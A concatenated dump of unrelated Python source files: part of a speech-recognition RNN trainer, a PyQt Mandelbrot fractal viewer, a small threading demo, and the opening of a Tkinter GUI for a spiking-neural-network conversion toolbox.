for j in xrange(len(words_data[i])):
words_data[i][j] = numpy.fromstring(words_data[i][j], 'int16') # Convert each frame from binary string to int16
words_data[i] = numpy.asarray(words_data[i]) # Convert the word data into numpy array
words_data[i] = words_data[i] / words_data[i].max() # Normalize the input
for i in xrange(len(words_data)):
print(words[i/REPEAT_N_TIMES] + '\t\t', rnn.run(words_data[i]))
@staticmethod
def extract_words_from_audio(audio_input,graphs=False,verbose=False):
try:
if audio_input == "0":
pass
else:
wf = wave.open(audio_input, 'rb') # Open .wav file from given path as audio_input in arguments
p = pyaudio.PyAudio() # Create a PyAudio session
# Create a stream
if audio_input == "0":
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
else:
stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
words_data = [] # Define words data array
all_frames = []
thresh_frames = []
if graphs:
shared_memory = multiprocessing.Manager() # Shared memory space manager
all_frames = shared_memory.list() # Define all_frames array in shared memory
thresh_frames = shared_memory.list() # Define thresh_frames array in shared memory
if audio_input == "0":
data = stream.read(CHUNK) # Get first data frame from the microphone
else:
data = wf.readframes(CHUNK) # Get first data frame from .wav file
all_frames.append(data) # Append to all frames
thresh_frames.append(EMPTY_CHUNK) # Append an EMPTY CHUNK to thresh frames
if graphs:
process1 = multiprocessing.Process(target=SpeechRecognition.draw_waveform, args=(all_frames, thresh_frames)) # Define draw waveform process
process1.start() # Start draw waveform process
process2 = multiprocessing.Process(target=SpeechRecognition.draw_spectrum_analyzer, args=(all_frames, thresh_frames)) # Define draw spectrum analyzer process
process2.start() # Start drar spectrum analyzer process
# Loop over the frames of the audio / data chunks
while data != '':
previous_data = data # Get previous chunk that coming from end of the loop
if audio_input == "0":
data = stream.read(CHUNK) # Read a new chunk from the stream
else:
if graphs:
stream.write(data) # Monitor current chunk
data = wf.readframes(CHUNK) # Read a new chunk from the stream
all_frames.append(data) # Append this chunk to all frames
thresh_frames.append(EMPTY_CHUNK) # Append an EMPTY CHUNK to thresh frames
rms = audioop.rms(data, 2) # Calculate Root Mean Square of current chunk
word_data = [] # Define single word data
if rms >= THRESHOLD: # If Root Mean Square value is greater than THRESHOLD constant
#starting_time = datetime.datetime.now() # Starting time of the word
thresh_frames.pop() # Pop out last frame of thresh frames
thresh_frames.pop() # Pop out last frame of thresh frames
word_data.append(previous_data) # Append previous chunk to training data
word_data.append(data) # Append current chunk to training data
thresh_frames.append(previous_data) # Append previous chunk to thresh frames
thresh_frames.append(data) # Append current chunk to thresh frames
silence_counter = 0 # Define silence counter
while silence_counter < SILENCE_DETECTION: # While silence counter value less than SILENCE_DETECTION constant
if audio_input == "0":
data = stream.read(CHUNK) # Read a new chunk from the stream
else:
if graphs:
stream.write(data) # Monitor current chunk
data = wf.readframes(CHUNK) # Read a new chunk from the stream
all_frames.append(data) # Append this chunk to all frames
word_data.append(data) # Append this chunk to training data
thresh_frames.append(data) # Append this chunk to thresh frames
rms = audioop.rms(data, 2) # Calculate Root Mean Square of current chunk again
if rms < THRESHOLD: # If Root Mean Square value is less than THRESHOLD constant
silence_counter += 1 # Then increase silence counter
else: # Else
silence_counter = 0 # Assign zero value to silence counter
#del word_data[-(SILENCE_DETECTION-2):] # Delete last frames of training data as much as SILENCE_DETECTION constant
#del thresh_frames[-(SILENCE_DETECTION-2):] # Delete last frames of thresh frames as much as SILENCE_DETECTION constant
#for i in range(SILENCE_DETECTION-2): # SILENCE_DETECTION constant times
# thresh_frames.append(EMPTY_CHUNK) # Append an EMPTY_CHUNK
#ending_time = datetime.datetime.now() # Ending time of the training
words_data.append(word_data)
if verbose:
print(len(words_data))
if graphs:
process1.terminate() # Terminate draw waveform process
process2.terminate() # Terminate drar spectrum analyzer process
stream.stop_stream() # Stop the stream
stream.close() # Close the stream
p.terminate() # Terminate the session
return words_data
except KeyboardInterrupt: # We will use KeyboardInterrupt to finish the microphone session
if graphs:
process1.terminate() # Terminate draw waveform process
process2.terminate() # Terminate drar spectrum analyzer process
stream.stop_stream() # Stop the stream
stream.close() # Close the stream
p.terminate() # Terminate the session
return words_data
@staticmethod
def create_training_data(audio_input,graphs=True,verbose=True):
try:
words_data = SpeechRecognition.extract_words_from_audio(audio_input,graphs,verbose)
except KeyboardInterrupt:
pass
else:
words = raw_input("Enter the words separating them by comma(,): ").split(',')
if len(words) == (len(words_data)/REPEAT_N_TIMES):
training_data = [frame for word_data in words_data for frame in word_data] # Flatten the words data into single big array of frames
SpeechRecognition.save_training_data(training_data,words) # Then save it
else:
print("Sorry, word counts don't match. Please try again.")
@staticmethod
def load_training_data():
words_data = []
words = []
for filename in os.listdir(TRAINING_DATA_DIRECTORY):
if filename.endswith(".wav"):
wav_path = os.path.join(TRAINING_DATA_DIRECTORY, filename)
words_data = words_data + SpeechRecognition.extract_words_from_audio(wav_path)
txt_path = os.path.join(TRAINING_DATA_DIRECTORY, filename[:-4] + ".txt")
with open(txt_path) as f:
words = words + [x.strip() for x in f.readlines()]
return (words_data,words)
@staticmethod
def train():
words_data, words = SpeechRecognition.load_training_data() # Load the training data
target = numpy.identity(len(words)) # Create a unit matrix (identity matrix) as our target
ri = []
for i in xrange(len(words)):
ri += [i] * REPEAT_N_TIMES
target = target[ri]
for i in xrange(len(words_data)):
for j in xrange(len(words_data[i])):
words_data[i][j] = numpy.fromstring(words_data[i][j], 'int16') # Convert each frame from binary string to int16
words_data[i] = numpy.asarray(words_data[i]) # Convert the word data into numpy array
words_data[i] = words_data[i] / words_data[i].max() # Normalize the input
rnn = RNN(len(words_data[0][0]), HIDDEN_NEURON, len(words)) # Create a Recurrent Neural Network instance
#print len(words_data[0][0]), len(words_data)
#print numpy.asarray(words_data[0]).shape # Input shape
#print target[0].shape # Target shape
lr = 0.01 # Learning rate
e = 1 # Initial error = 1
vals = [] # Values for plotting
n_iteration = TRAINING_ITERATION
for i in xrange(n_iteration): # Iterate (n_iteration) times
for j in xrange(len(words_data)): # For each word in words
u = words_data[j] # Input (2048)
t = target[j] # Target (word count)
c = rnn.train_step(u, t, lr) # Cost
print("iteration {0}: {1}".format(i, numpy.sqrt(c)))
e = (1.0/len(words_data))*numpy.sqrt(c) + ((len(words_data) - 1.0)/len(words_data))*e # Contributes to error 1 / word count
if i % (n_iteration/100) == 0:
vals.append(e)
if not os.path.exists(OUT_DIRECTORY): # Check whether the directory is exist or not
os.makedirs(OUT_DIRECTORY) # If there is none then create one
rnn.dump(OUT_DIRECTORY) # Dump model.npz (reusable training result) to out/ directory
print("The neural network dump saved into: " + OUT_DIRECTORY + "model.npz")
with open(OUT_DIRECTORY + "words.txt", "w") as thefile:
for word in words:
thefile.write("%s\n" % word) # Dump the words line by line
print("The word list saved into: " + OUT_DIRECTORY + "words.txt")
plt.plot(vals) # Plot the graph
if not os.path.exists(PLOTS_DIRECTORY): # Check whether the directory is exist or not
os.makedirs(PLOTS_DIRECTORY) # If there is none then create one
plt.savefig(PLOTS_DIRECTORY + 'error.png') # Save the graph
print("Graph of the decline of error by the time is saved as: " + PLOTS_DIRECTORY + "error.png")
print("--- TESTING ---")
del rnn
rnn = RNN(len(words_data[0][0]), HIDDEN_NEURON, len(words))
rnn.importdump(OUT_DIRECTORY + "model.npz")
for i in xrange(len(words_data)):
print(words[i/REPEAT_N_TIMES] + '\t\t', rnn.run(words_data[i]))
if __name__ == "__main__":
import argparse # Makes it easy to write user-friendly command-line interfaces.
ap = argparse.ArgumentParser() # Define an Argument Parser
ap.add_argument("-a", "--audio", help="path to the audio file") # Add --audio argument
ap.add_argument("-c", "--create", help="create training data, use with --audio")
ap.add_argument("-t", "--train", help="train the network, use just by itself")
args = vars(ap.parse_args()) # Parse the arguments
if args["train"]:
SpeechRecognition.train()
elif args["create"] and args["audio"]:
SpeechRecognition.create_training_data(args["audio"])
elif args["audio"]:
SpeechRecognition.start(args["audio"])
else:
print("You tried to use it with a wrong combination. Check out --help")
|
Mandelbrot.py
|
import sys, random, math
from PyQt5.QtWidgets import *
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QPainter, QColor
from multiprocessing import Process
xMin = -3
xMax = 3
yMin = -3
yMax = 3
#widthScale = 3
#heightScale = 3
zoomLevel = 4
class Mandelbrot(QWidget):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.setGeometry(300, 300, 700, 700) #300, 190
self.setWindowTitle('Mandelbrot')
self.show()
#Custom version of the range function that works with float numbers
def frange(self, start, stop, step):
i = start
while i < stop:
yield i
i += step
def linearMap(self, value, low, high, newLow, newHigh):
return newLow + ((value - low) / (high - low)) * (newHigh - newLow)
#Called whenever the window is resized or brought into focus
def paintEvent(self, event):
qp = QPainter()
qp.begin(self)
#Run the drawMandelbrot program
#self.runMultiprocessing(qp)
self.drawMandelbrot(qp, xMin, xMax, yMin, yMax)
qp.end()
def runMultiprocessing(self, qp):
numberOfThreads = 4
totalLength = abs(xMin) + abs(xMax)
pieceLength = totalLength / numberOfThreads
for i in range(numberOfThreads):
xMinNew = xMin + (pieceLength * i)
xMaxNew = xMin + (pieceLength * (i + 1))
print("Process ", i, " started.")
p = Process(target=self.drawMandelbrot, args=(qp, xMinNew, xMaxNew, yMin, yMax))
p.start()
p.join()
def mousePressEvent(self, event):
global xMin
global xMax
global yMin
global yMax
size = self.size()
windowWidth = size.width()
windowHeight = size.height()
xMouse = event.x()
yMouse = event.y()
#print("xMouse: ", xMouse)
#print("yMouse: ", yMouse)
#print("Before Map - xMin: ", xMin)
#print("Before Map - yMin: ", yMin)
#print("Before Map - xMax: ", xMax)
#print("Before Map - yMax: ", yMax)
xMouse = self.linearMap(xMouse, 0, windowWidth, xMin, xMax)
yMouse = self.linearMap(yMouse, 0, windowHeight, yMax, yMin)
#print("xMouse: ", xMouse)
#print("yMouse: ", yMouse)
#Make temporary variables to store the new x/y min/max so they aren't changed while the algorithms are still working
xMinTemp = xMouse - ((xMax - xMin) / (zoomLevel * zoomLevel))
xMaxTemp = xMouse + ((xMax - xMin) / (zoomLevel * zoomLevel))
yMinTemp = yMouse - ((yMax - yMin) / (zoomLevel * zoomLevel))
yMaxTemp = yMouse + ((yMax - yMin) / (zoomLevel * zoomLevel))
xMin = xMinTemp
xMax = xMaxTemp
yMin = yMinTemp
yMax = yMaxTemp
#Update scale for the new zoomed in view
#widthScale = widthScale / ((zoomLevel * zoomLevel) / 1.5)
#heightScale = heightScale / ((zoomLevel * zoomLevel) / 1.5)
widthScale = (xMax - xMin) / size.width()
heightScale = (yMax - yMin) / size.height()
self.repaint()
#print("Done zooming in.")
#print("New xMin: ", xMin)
#print("New xMax: ", xMax)
#print("New yMin: ", yMin)
#print("New yMax: ", yMax)
#print("New widthScale: ", widthScale)
#print("New heightScale: ", heightScale)
#print(x)
#print(y)
def drawMandelbrot(self, qp, xMin, xMax, yMin, yMax):
#Variables
size = self.size()
maxIteration = 255
widthScale = (xMax - xMin) / size.width()
heightScale = (yMax - yMin) / size.height()
# widthScale = 6 / size.width()
# heightScale = 6 / size.height()
for w in self.frange(xMin, xMax, widthScale):
for h in self.frange(yMin, yMax, heightScale):
x = 0
y = 0
iteration = 0
while (x*x + y*y <= 4) and (iteration < maxIteration):
xtemp = (x*x - y*y) + w
y = ((2*x) * y) + h
x = xtemp
iteration += 1
'''
if iteration != maxIteration:
if iteration <= 33:
qp.setPen(QColor(self.linearMap(iteration, 0, 33, 0, 255), 255, 255)) #Red is based on iteration
#qp.setPen(Qt.red)
elif iteration > 33 and iteration <= 66:
qp.setPen(QColor(255, self.linearMap(iteration, 33, 66, 0, 255), 255)) #Green is based on iteration
#qp.setPen(Qt.green)
else:
qp.setPen(QColor(255, 255, self.linearMap(iteration, 67, maxIteration, 0, 255))) #Blue is based on iteration
#qp.setPen(Qt.blue)
else:
qp.setPen(Qt.black)
'''
if iteration != maxIteration:
qp.setPen(QColor.fromHsv(iteration, 255, 255))
else:
qp.setPen(Qt.black)
newW = self.linearMap(w, xMin, xMax, 0, size.width() - 1)
newH = self.linearMap(h, yMin, yMax, size.height() - 1, 0)
qp.drawPoint(newW, newH)
def main():
app = QApplication([])
ex = Mandelbrot()
app.exec_()
if __name__ == '__main__':
main()
|
demo_threads2.py
|
# Python program to illustrate the concept
# of threading
# importing the threading module
import threading
import time
def print_cube(num):
"""
function to print cube of given num
"""
time.sleep(5)
print("Cube: {}".format(num * num * num))
def print_square(num):
"""
function to print square of given num
"""
print("Square: {}".format(num * num))
if __name__ == "__main__":
# creating thread
t1 = threading.Thread(target=print_square, args=(10,))
t2 = threading.Thread(target=print_cube, args=(10,))
t3 = threading.Thread(target=print_cube, args=(10,))
# starting thread 1
t1.start()
# starting thread 2
t2.start()
# starting thread 3
t3.start()
# wait until thread 1 is completely executed
t1.join()
print(f'{t1.getName()} done')
# wait until thread 2 is completely executed
t2.join()
print(f'{t2.getName()} done')
# wait until thread 3 is completely executed
t2.join()
print(f'{t3.getName()} done')
# both threads completely executed
print("Done!")
|
gui.py
|
# -*- coding: utf-8 -*-
"""
Graphical User interface for the SNN conversion toolbox.
Features
--------
- Allows setting parameters and what tools to use during an experiment.
- Performs basic checks that specified parameters are valid.
- Preferences can be saved and reloaded.
- Tooltips explain the functionality.
- Automatically recognizes result plots and allows displaying them in a
separate window.
Note
----
Due to rapid extensions in the main toolbox, we have not always been able to
update the GUI to cover all functionality of the toolbox. We are currently
not maintaining the GUI and recommend using the terminal to run experiments.
@author: rbodo
"""
from __future__ import with_statement
import json
import os
import sys
import threading
import webbrowser
from textwrap import dedent
import matplotlib.gridspec as gridspec
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.backends.backend_tkagg import NavigationToolbar2TkAgg
from snntoolbox.bin.utils import test_full
from snntoolbox.bin.gui.tooltip import ToolTip
if sys.version_info[0] < 3:
# noinspection PyPep8Naming,PyUnresolvedReferences,PyPackageRequirements
import Tkinter as tk
# noinspection PyPep8Naming,PyUnresolvedReferences
import tkFileDialog as filedialog
# noinspection PyPep8Naming,PyUnresolvedReferences
import tkMessageBox as messagebox
# noinspection PyPep8Naming,PyUnresolvedReferences
import tkFont as font
# noinspection PyCompatibility,PyUnresolvedReferences
from Queue import Queue
else:
import tkinter as tk
# noinspection PyCompatibility
from tkinter import filedialog, messagebox, font
# noinspection PyCompatibility
from queue import Queue
# noinspection PyAttributeOutsideInit
class SNNToolboxGUI:
def __init__(self, root, config):
self.initialized = False
self.root = root
self.config = config
self.toolbox_root = os.getcwd()
self.default_path_to_pref = os.path.join(self.toolbox_root,
'preferences')
self.define_style()
self.declare_parameter_vars()
self.load_settings()
self.main_container = tk.Frame(root, bg='white')
self.main_container.pack(side='top', fill='both', expand=True)
self.globalparams_widgets()
self.cellparams_widgets()
self.simparams_widgets()
self.tools_widgets()
self.graph_widgets()
self.top_level_menu()
self.toggle_state_pynn(self.settings['simulator'].get())
self.toggle_poisson_input_state()
self.initialized = True
def define_style(self):
"""Define apperance style."""
self.padx = 10
self.pady = 5
font_family = 'clearlyu devagari'
self.header_font = (font_family, '11', 'bold')
font.nametofont('TkDefaultFont').configure(family=font_family, size=11)
font.nametofont('TkMenuFont').configure(family=font_family, size=11,
weight=font.BOLD)
font.nametofont('TkTextFont').configure(family=font_family, size=11)
self.kwargs = {'fill': 'both', 'expand': True,
'padx': self.padx, 'pady': self.pady}
def initialize_thread(self):
"""Separate thread for conversion process."""
self.res_queue = Queue()
# Create thread for performing the conversion in the background.
# Make it a daemon so it is killed when the main application is closed.
if sys.version_info[0] < 3:
self.process_thread = threading.Thread(target=test_full,
args=(self.res_queue,),
name='conversion process')
self.process_thread.daemon = True
else:
self.process_thread = threading.Thread(target=test_full,
args=(self.res_queue,),
name='conversion process',
daemon=True)
def globalparams_widgets(self):
"""Global parameters widgets."""
# Create a container for individual parameter widgets
self.globalparams_frame = tk.LabelFrame(self.main_container,
labelanchor='nw',
text="Global parameters",
relief='raised',
borderwidth='3', bg='white')
self.globalparams_frame.pack(side='left', fill=None, expand=False)
tip = dedent("""\
Specify general properties of your model and the steps to
include in your experiment.""")
ToolTip(self.globalparams_frame, text=tip, wraplength=750, delay=1499)
# Data-set path
dataset_frame = tk.Frame(self.globalparams_frame, bg='white')
dataset_frame.pack(**self.kwargs)
tk.Label(dataset_frame, text="Dataset", bg='white').pack(
fill='both', expand=True)
tk.Button(dataset_frame, text="Dataset path",
command=self.set_dataset_path,
font=self.header_font).pack(side='top')
self.dataset_entry = tk.Entry(
dataset_frame, textvariable=self.settings['dataset_path'],
width=20, validate='focusout', bg='white',
validatecommand=(dataset_frame.register(self.check_dataset_path),
'%P'))
self.dataset_entry.pack(fill='both', expand=True, side='left')
scroll_x = tk.Scrollbar(dataset_frame, orient=tk.HORIZONTAL,
command=self.__scroll_handler)
scroll_x.pack(fill='x', expand=True, side='right')
self.dataset_entry['xscrollcommand'] = scroll_x.set
tip = dedent("""\
Select a directory where the toolbox will find the samples to test.
Two input formats are supported:
A) .npz: Compressed numpy format.
B) .jpg: Images in directories corresponding to their class.
A) Provide at least two compressed numpy files called 'x_test.npz'
and 'y_test.npz' containing the testset and groundtruth. In
addition, if the network should be normalized, put a file
'x_norm.npz' in the folder. This can be a the training set x_train,
or a subset of it. Take care of memory limitations: If numpy can
allocate a 4 GB float32 container for the activations to be
computed during normalization, x_norm should contain not more than
4*1e9*8bit/(fc*fx*fy*32bit) = 1/n samples, where (fc, fx, fy) is
the shape of the largest layer, and n = fc*fx*fy its total cell
count.
B) The images are stored in subdirectories of the selected
'dataset_path', where the names of the subdirectories represent
their class label. The toolbox will then use
Keras.ImageDataGenerator to load and process the files batchwise.
With original data of the form (channels, num_rows, num_cols),
x_norm and x_test have dimension
(num_samples, channels*num_rows*num_cols) for a fully-connected
network, and (num_samples, channels, num_rows, num_cols) otherwise.
y_train and y_test have dimension (num_samples, num_classes).
See snntoolbox.datasets for examples how to prepare a
dataset for use in the toolbox.""")
ToolTip(dataset_frame, text=tip, wraplength=750)
# Data-set format
format_frame = tk.Frame(self.globalparams_frame, bg='white')
format_frame.pack(**self.kwargs)
tk.Radiobutton(format_frame, variable=self.settings['dataset_format'],
text='.npz', value='npz', bg='white').pack(
fill='both', side='left', expand=True)
tk.Radiobutton(format_frame, variable=self.settings['dataset_format'],
text='.jpg',
value='jpg', bg='white').pack(
fill='both', side='right', expand=True)
tip = dedent("""\
Select a directory where the toolbox will find the samples to test.
Two input formats are supported:
A) .npz: Compressed numpy format.
B) .jpg: Images in directories corresponding to their class.
See dataset path tooltip for more details.""")
ToolTip(format_frame, text=tip, wraplength=750)
# Model library
model_libs = eval(self.config.get('restrictions', 'model_libs'))
model_lib_frame = tk.Frame(self.globalparams_frame, bg='white')
model_lib_frame.pack(**self.kwargs)
tip = "The neural network library used to create the input model."
ToolTip(model_lib_frame, text=tip, wraplength=750)
tk.Label(model_lib_frame, text="Model library",
bg='white').pack(fill='both', expand=True)
model_lib_om = tk.OptionMenu(model_lib_frame,
self.settings['model_lib'],
*list(model_libs))
model_lib_om.pack(fill='both', expand=True)
# Batch size
batch_size_frame = tk.Frame(self.globalparams_frame, bg='white')
batch_size_frame.pack(**self.kwargs)
tk.Label(batch_size_frame, text="Batch size",
bg='white').pack(fill='both', expand=True)
batch_size_sb = tk.Spinbox(batch_size_frame, bg='white',
textvariable=self.settings['batch_size'],
from_=1, to_=1e9, increment=1, width=10)
batch_size_sb.pack(fill='y', expand=True, ipady=5)
tip = dedent("""\
If the builtin simulator 'INI' is used, the batch size specifies
the number of test samples that will be simulated in parallel.
Important: When using 'INI' simulator, the batch size can only be
run using the batch size it has been converted with. To run it
with a different batch size, convert the ANN from scratch.""")
ToolTip(batch_size_frame, text=tip, wraplength=700)
# Verbosity
verbose_frame = tk.Frame(self.globalparams_frame, bg='white')
verbose_frame.pack(**self.kwargs)
tk.Label(verbose_frame, text="Verbosity", bg='white').pack(fill='both',
expand=True)
[tk.Radiobutton(verbose_frame, variable=self.settings['verbose'],
text=str(i), value=i, bg='white').pack(fill='both',
side='left',
expand=True)
for i in range(4)]
tip = dedent("""\
0: No intermediate results or status reports.
1: Print progress of simulation and intermediate results.
2: Record spiketrains of all layers for one sample, and save
various plots (spiketrains, spikerates, activations,
correlations, ...)
3: Record, plot and return the membrane potential of all layers
for the last test sample. Very time consuming. Works only with
pyNN simulators.""")
ToolTip(verbose_frame, text=tip, wraplength=750)
# Set and display working directory
path_frame = tk.Frame(self.globalparams_frame, bg='white')
path_frame.pack(**self.kwargs)
tk.Button(path_frame, text="Set working dir", font=self.header_font,
command=self.set_cwd).pack(side='top')
self.path_entry = tk.Entry(
path_frame, textvariable=self.settings['path_wd'], width=20,
validate='focusout', bg='white',
validatecommand=(path_frame.register(self.check_path), '%P'))
self.path_entry.pack(fill='both', expand=True, side='left')
scroll_x2 = tk.Scrollbar(path_frame, orient=tk.HORIZONTAL,
command=self.__scroll_handler)
scroll_x2.pack(fill='x', expand=True, side='bottom')
self.path_entry['xscrollcommand'] = scroll_x2.set
tip = dedent("""\
Specify the working directory. There, the toolbox will look for
ANN models to convert or SNN models to test, load the parameters
it needs and store (normalized) parameters.""")
ToolTip(path_frame, text=tip, wraplength=750)
# Specify filename base
filename_frame = tk.Frame(self.globalparams_frame)
filename_frame.pack(**self.kwargs)
tk.Label(filename_frame, text="Filename base:", bg='white').pack(
fill='both', expand=True)
self.filename_entry = tk.Entry(
filename_frame, bg='white', width=20, validate='focusout',
textvariable=self.settings['filename_ann'],
validatecommand=(filename_frame.register(self.check_file), '%P'))
self.filename_entry.pack(fill='both', expand=True, side='bottom')
tip = dedent("""\
Base name of all loaded and saved files during this run. The ANN
model to be converted is expected to be named '<basename>'.
The toolbox will save and load converted SNN models under the
name 'snn_<basename>'. When exporting a converted spiking net to
test it in a specific simulator, the toolbox writes the exported
SNN to files named ``snn_<basename>_<simulator>``.""")
ToolTip(filename_frame, text=tip, wraplength=750)
def cellparams_widgets(self):
"""Create a container for individual parameter widgets."""
self.cellparams_frame = tk.LabelFrame(
self.main_container, labelanchor='nw', text="Cell\n parameters",
relief='raised', borderwidth='3', bg='white')
self.cellparams_frame.pack(side='left', fill=None, expand=False)
tip = dedent("""\
Specify parameters of individual neuron cells in the
converted spiking network. Some are simulator specific.""")
ToolTip(self.cellparams_frame, text=tip, wraplength=750, delay=1499)
# Threshold
v_thresh_frame = tk.Frame(self.cellparams_frame, bg='white')
v_thresh_frame.pack(**self.kwargs)
tk.Label(v_thresh_frame, text="v_thresh", bg='white').pack(fill='both',
expand=True)
v_thresh_sb = tk.Spinbox(v_thresh_frame,
textvariable=self.settings['v_thresh'],
from_=-1e3, to_=1e3, increment=1e-3, width=10)
v_thresh_sb.pack(fill='y', expand=True, ipady=3)
tip = "Threshold in mV defining the voltage at which a spike is fired."
ToolTip(v_thresh_frame, text=tip, wraplength=750)
# Refractory time constant
tau_refrac_frame = tk.Frame(self.cellparams_frame, bg='white')
tau_refrac_frame.pack(**self.kwargs)
tk.Label(tau_refrac_frame, text="tau_refrac",
bg='white').pack(fill='both', expand=True)
tau_refrac_sb = tk.Spinbox(tau_refrac_frame,
textvariable=self.settings['tau_refrac'],
width=10, from_=0, to_=1e3, increment=0.01)
tau_refrac_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Duration of refractory period in milliseconds of the neurons
after spiking.""")
ToolTip(tau_refrac_frame, text=tip, wraplength=750)
# Reset
v_reset_frame = tk.Frame(self.cellparams_frame, bg='white')
v_reset_frame.pack(**self.kwargs)
self.v_reset_label = tk.Label(v_reset_frame, text="v_reset",
state=self.settings['state_pyNN'].get(),
bg='white')
self.v_reset_label.pack(fill='both', expand=True)
self.v_reset_sb = tk.Spinbox(
v_reset_frame, disabledbackground='#eee', width=10,
textvariable=self.settings['v_reset'], from_=-1e3, to_=1e3,
increment=0.1, state=self.settings['state_pyNN'].get())
self.v_reset_sb.pack(fill='y', expand=True, ipady=3)
tip = "Reset potential in mV of the neurons after spiking."
ToolTip(v_reset_frame, text=tip, wraplength=750)
# Resting potential
v_rest_frame = tk.Frame(self.cellparams_frame, bg='white')
v_rest_frame.pack(**self.kwargs)
self.v_rest_label = tk.Label(v_rest_frame, text="v_rest", bg='white',
state=self.settings['state_pyNN'].get())
self.v_rest_label.pack(fill='both', expand=True)
self.v_rest_sb = tk.Spinbox(
v_rest_frame, disabledbackground='#eee', width=10,
textvariable=self.settings['v_rest'], from_=-1e3, to_=1e3,
increment=0.1, state=self.settings['state_pyNN'].get())
self.v_rest_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Resting membrane potential in mV.
Only relevant in pyNN-simulators.""")
ToolTip(v_rest_frame, text=tip, wraplength=750)
# e_rev_E
e_rev_exc_frame = tk.Frame(self.cellparams_frame, bg='white')
e_rev_exc_frame.pack(**self.kwargs)
self.e_rev_E_label = tk.Label(e_rev_exc_frame, text="e_rev_E",
state=self.settings['state_pyNN'].get(),
bg='white')
self.e_rev_E_label.pack(fill='both', expand=True)
self.e_rev_E_sb = tk.Spinbox(
e_rev_exc_frame, disabledbackground='#eee', width=10,
textvariable=self.settings['e_rev_E'], from_=-1e-3, to_=1e3,
increment=0.1, state=self.settings['state_pyNN'].get())
self.e_rev_E_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Reversal potential for excitatory input in mV.
Only relevant in pyNN-simulators.""")
ToolTip(e_rev_exc_frame, text=tip, wraplength=750)
# e_rev_I
e_rev_inh_frame = tk.Frame(self.cellparams_frame, bg='white')
e_rev_inh_frame.pack(**self.kwargs)
self.e_rev_I_label = tk.Label(e_rev_inh_frame, text="e_rev_I",
state=self.settings['state_pyNN'].get(),
bg='white')
self.e_rev_I_label.pack(fill='both', expand=True)
self.e_rev_I_sb = tk.Spinbox(
e_rev_inh_frame, disabledbackground='#eee', width=10,
textvariable=self.settings['e_rev_I'], from_=-1e3, to_=1e3,
increment=0.1, state=self.settings['state_pyNN'].get())
self.e_rev_I_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Reversal potential for inhibitory input in mV.
Only relevant in pyNN-simulators.""")
ToolTip(e_rev_inh_frame, text=tip, wraplength=750)
# i_offset
i_offset_frame = tk.Frame(self.cellparams_frame, bg='white')
i_offset_frame.pack(**self.kwargs)
self.i_offset_label = tk.Label(
i_offset_frame, text="i_offset", bg='white',
state=self.settings['state_pyNN'].get())
self.i_offset_label.pack(fill='both', expand=True)
self.i_offset_sb = tk.Spinbox(i_offset_frame, width=10,
textvariable=self.settings['i_offset'],
from_=-1e3, to_=1e3, increment=1,
state=self.settings['state_pyNN'].get(),
disabledbackground='#eee')
self.i_offset_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Offset current in nA.
Only relevant in pyNN-simulators.""")
ToolTip(i_offset_frame, text=tip, wraplength=750)
# Membrane capacitance
cm_frame = tk.Frame(self.cellparams_frame, bg='white')
cm_frame.pack(**self.kwargs)
self.cm_label = tk.Label(cm_frame, text="C_mem", bg='white',
state=self.settings['state_pyNN'].get(), )
self.cm_label.pack(fill='both', expand=True)
self.cm_sb = tk.Spinbox(cm_frame, textvariable=self.settings['cm'],
from_=1e-3, to_=1e3, increment=1e-3, width=10,
state=self.settings['state_pyNN'].get(),
disabledbackground='#eee')
self.cm_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Membrane capacitance in nF.
Only relevant in pyNN-simulators.""")
ToolTip(cm_frame, text=tip, wraplength=750)
# tau_m
tau_m_frame = tk.Frame(self.cellparams_frame, bg='white')
tau_m_frame.pack(**self.kwargs)
self.tau_m_label = tk.Label(tau_m_frame, text="tau_m", bg='white',
state=self.settings['state_pyNN'].get())
self.tau_m_label.pack(fill='both', expand=True)
self.tau_m_sb = tk.Spinbox(tau_m_frame, disabledbackground='#eee',
textvariable=self.settings['tau_m'],
from_=1, to_=1e6, increment=1, width=10,
state=self.settings['state_pyNN'].get())
self.tau_m_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Membrane time constant in milliseconds.
Only relevant in pyNN-simulators.""")
ToolTip(tau_m_frame, text=tip, wraplength=750)
# tau_syn_E
tau_syn_exc_frame = tk.Frame(self.cellparams_frame, bg='white')
tau_syn_exc_frame.pack(**self.kwargs)
self.tau_syn_E_label = tk.Label(
tau_syn_exc_frame, text="tau_syn_E", bg='white',
state=self.settings['state_pyNN'].get())
self.tau_syn_E_label.pack(fill='both', expand=True)
self.tau_syn_E_sb = tk.Spinbox(tau_syn_exc_frame, width=10,
textvariable=self.settings['tau_syn_E'],
from_=1e-3, to_=1e3, increment=1e-3,
state=self.settings['state_pyNN'].get(),
disabledbackground='#eee')
self.tau_syn_E_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Decay time of the excitatory synaptic conductance in
milliseconds.
Only relevant in pyNN-simulators.""")
ToolTip(tau_syn_exc_frame, text=tip, wraplength=750)
# tau_syn_I
tau_syn_inh_frame = tk.Frame(self.cellparams_frame, bg='white')
tau_syn_inh_frame.pack(**self.kwargs)
self.tau_syn_I_label = tk.Label(
tau_syn_inh_frame, text="tau_syn_I", bg='white',
state=self.settings['state_pyNN'].get())
self.tau_syn_I_label.pack(fill='both', expand=True)
self.tau_syn_I_sb = tk.Spinbox(tau_syn_inh_frame, width=10,
textvariable=self.settings['tau_syn_I'],
from_=1e-3, to_=1e3, increment=1e-3,
state=self.settings['state_pyNN'].get(),
disabledbackground='#eee')
self.tau_syn_I_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Decay time of the inhibitory synaptic conductance in
milliseconds.
Only relevant in pyNN-simulators.""")
ToolTip(tau_syn_inh_frame, text=tip, wraplength=750)
def simparams_widgets(self):
